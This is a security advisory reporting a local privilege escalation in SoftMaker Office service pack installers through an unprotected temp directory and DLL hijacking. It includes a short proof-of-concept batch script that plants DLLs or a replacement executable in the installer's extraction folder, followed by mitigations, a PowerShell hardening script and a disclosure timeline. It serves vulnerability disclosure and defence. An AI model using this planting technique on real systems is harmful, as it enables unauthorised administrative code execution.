SoftMaker Office 201x Privilege Escalation

Posted Jan 4, 2017
Authored by Stefan Kanthak

SoftMaker Office 201x suffers from a local privilege escalation vulnerability due to an unprotected directory.

tags | exploit, local
SHA-256 | b98074bf19e66e0f81e92f16fb516806bfdbf2c540066e3392ed006fb5a1d993

Hi @ll,

the service pack installers for SoftMaker Office 201x, available
from <http://www.softmaker.com/en/servicepacks-office-windows>,
are (surprise.-) vulnerable.


The executable installer (OUCH) ofw16_763.exe, a 7z SFX (OUCH),
creates an UNPROTECTED directory "%TEMP%\7zSxxxxxxxx\" to extract
its payload, then executes "%TEMP%\7zSxxxxxxxx\spsetup.exe".

"%TEMP%\7zSxxxxxxxx\" inherits the NTFS access rights of its parent
"%TEMP%\", i.e. allows full access for the UNPRIVILEGED user.

For this well-known vulnerability see
<https://cwe.mitre.org/data/definitions/377.html> and
<https://cwe.mitre.org/data/definitions/379.html>


Due to the embedded application manifest which specifies
"requireAdministrator" the executable installer can only be run
with administrative rights.

JFTR: if written properly, it would create a PROTECTED directory
"%TEMP%\7zSxxxxxxxx\", writable only for privileged users!

The UNPRIVILEGED user as well as any program running with the
user's credentials can modify the extracted files, for example
"%TEMP%\7zSxxxxxxxx\spsetup.exe", which is executed with
administrative rights, resulting in arbitrary code execution
with elevation of privilege.

Additionally "spsetup.exe" is vulnerable to DLL hijacking,
another well-known vulnerability.
See <https://capec.mitre.org/data/definitions/471.html>,
<https://cwe.mitre.org/data/definitions/426.html>,
<https://cwe.mitre.org/data/definitions/427.html>,
<https://technet.microsoft.com/en-us/library/2269637.aspx>,
<https://msdn.microsoft.com/en-us/library/ff919712.aspx> and
<https://msdn.microsoft.com/en-us/library/ms682586.aspx> plus
<http://blogs.technet.com/b/srd/archive/2014/05/13/load-library-safely.aspx>

Thanks to the unprotected directory "%TEMP%\7zSxxxxxxxx\" the
unprivileged user can write DLLs to "%TEMP%\7zSxxxxxxxx\" which
are loaded by "spsetup.exe", again resulting in arbitrary code
execution with elevation of privilege!


Proof-of-concept:
~~~~~~~~~~~~~~~~~

0. download <http://www.softmaker.net/down/ofw16_763.exe> and
save it in an arbitrary directory;

1. download <http://home.arcor.de/skanthak/download/SENTINEL.DLL>
(see <http://home.arcor.de/skanthak/sentinel.html> alias
<https://skanthak.homepage.t-online.de/sentinel.html>) and
save it in an(other) arbitrary directory;

2. save the following batch script in the same directory as
SENTINEL.DLL:

--- OFW16_873.CMD ---
:WAIT
@If Not Exist "%TEMP%\7z*" Goto :WAIT
For /D %%! In ("%TEMP%\7z*") Do Set foobar=%%!
Copy "SENTINEL.DLL" "%foobar%\NTMARTA.DLL"
Copy "SENTINEL.DLL" "%foobar%\VERSION.DLL"
Copy "SENTINEL.DLL" "%foobar%\WINSPOOL.DRV"
--- EOF ---

3. start the batch script;

4. execute ofw16_873.exe and notice the message boxes displayed
by SENTINEL.DLL.

PWNED!

5. download <http://home.arcor.de/skanthak/download/SENTINEL.EXE>
to the same directory as the batch script;

6. in the batch script replace the 3 lines Copy ... with
Copy "SENTINEL.EXE" "%foobar%\spsetup.exe"

7. start the batch script;

8. execute ofw16_873.exe and notice the message box displayed
by SENTINEL.EXE.

PWNED!


Mitigations:
~~~~~~~~~~~~

* Don't use executable installers! NEVER!
Don't use self-extractors! NEVER!

See <http://seclists.org/fulldisclosure/2015/Nov/101> and
<http://seclists.org/fulldisclosure/2015/Dec/86> plus
<http://home.arcor.de/skanthak/!execute.html> alias
<https://skanthak.homepage.t-online.de/!execute.html> for more
information.

* Practice STRICT privilege separation: NEVER use the so-called
"protected" administrator account(s) created during Windows
setup which use the same "%TEMP%" for unprivileged and privileged
processes!

* Add an ACE "(D;OIIO;WP;;;WD)" to the ACL of every "%USERPROFILE%";
use <https://msdn.microsoft.com/en-us/library/aa374928.aspx> to
decode it to "deny execution of files in this directory for
everyone, inheritable to all files in all subdirectories".
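The ACE above, decoded and applied with the .NET ACL classes from PowerShell. This is an added example, not code from the advisory; the function names are my own, and it assumes it is run as the owner of the profile directory being hardened:

```powershell
# Added example (not from the advisory): decode "(D;OIIO;WP;;;WD)" and
# apply the equivalent access rule to a directory, default %USERPROFILE%.

function ConvertFrom-SddlAce {
    param([string]$Ace = "(D;OIIO;WP;;;WD)")
    # Wrap the single ACE in a DACL so RawSecurityDescriptor can parse it
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor("D:$Ace")
    foreach ($e in $sd.DiscretionaryAcl) {
        [pscustomobject]@{
            Type        = $e.AceType                                  # AccessDenied  (D)
            Trustee     = $e.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value  # Everyone (WD)
            Rights      = [System.Security.AccessControl.FileSystemRights]$e.AccessMask  # ExecuteFile (WP)
            Inheritance = $e.InheritanceFlags                         # ObjectInherit (OI)
            Propagation = $e.PropagationFlags                         # InheritOnly   (IO)
        }
    }
}

function Add-DenyExecuteAce {
    param([string]$Path = $env:USERPROFILE)
    $acl = Get-Acl -LiteralPath $Path
    # Same ACE expressed as a FileSystemAccessRule: deny FILE_EXECUTE to
    # Everyone, inherited by files in all subdirectories, not by the directory itself
    $rule = New-Object System.Security.AccessControl.FileSystemAccessRule(
        [System.Security.Principal.SecurityIdentifier]'S-1-1-0',          # Everyone (WD)
        [System.Security.AccessControl.FileSystemRights]::ExecuteFile,    # WP
        [System.Security.AccessControl.InheritanceFlags]::ObjectInherit,  # OI: files only
        [System.Security.AccessControl.PropagationFlags]::InheritOnly,    # IO: not the dir itself
        [System.Security.AccessControl.AccessControlType]::Deny)          # D
    $acl.AddAccessRule($rule)
    Set-Acl -LiteralPath $Path -AclObject $acl
    # Return the resulting DACL as SDDL so the new (D;OIIO;WP;;;WD) entry is visible
    (Get-Acl -LiteralPath $Path).Sddl
}

ConvertFrom-SddlAce | Format-List
# Add-DenyExecuteAce    # uncomment to apply the ACE to %USERPROFILE%
```

Because the deny is granted to Everyone it also binds the profile owner, so per-user installers that place executables under the profile (e.g. in %LOCALAPPDATA%) will stop working; that is the trade-off the mitigation makes.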


stay tuned
Stefan Kanthak


Timeline:
~~~~~~~~~

2016-12-15 sent vulnerability report to vendor

no reply, not even an acknowledgement of receipt

2016-12-23 resent vulnerability report to vendor, cc CERT at
German BSI

no reply, not even an acknowledgement of receipt

2016-12-27 CERT at German BSI contacts vendor offering help

no reply, not even an acknowledgement of receipt

2016-12-31 report published

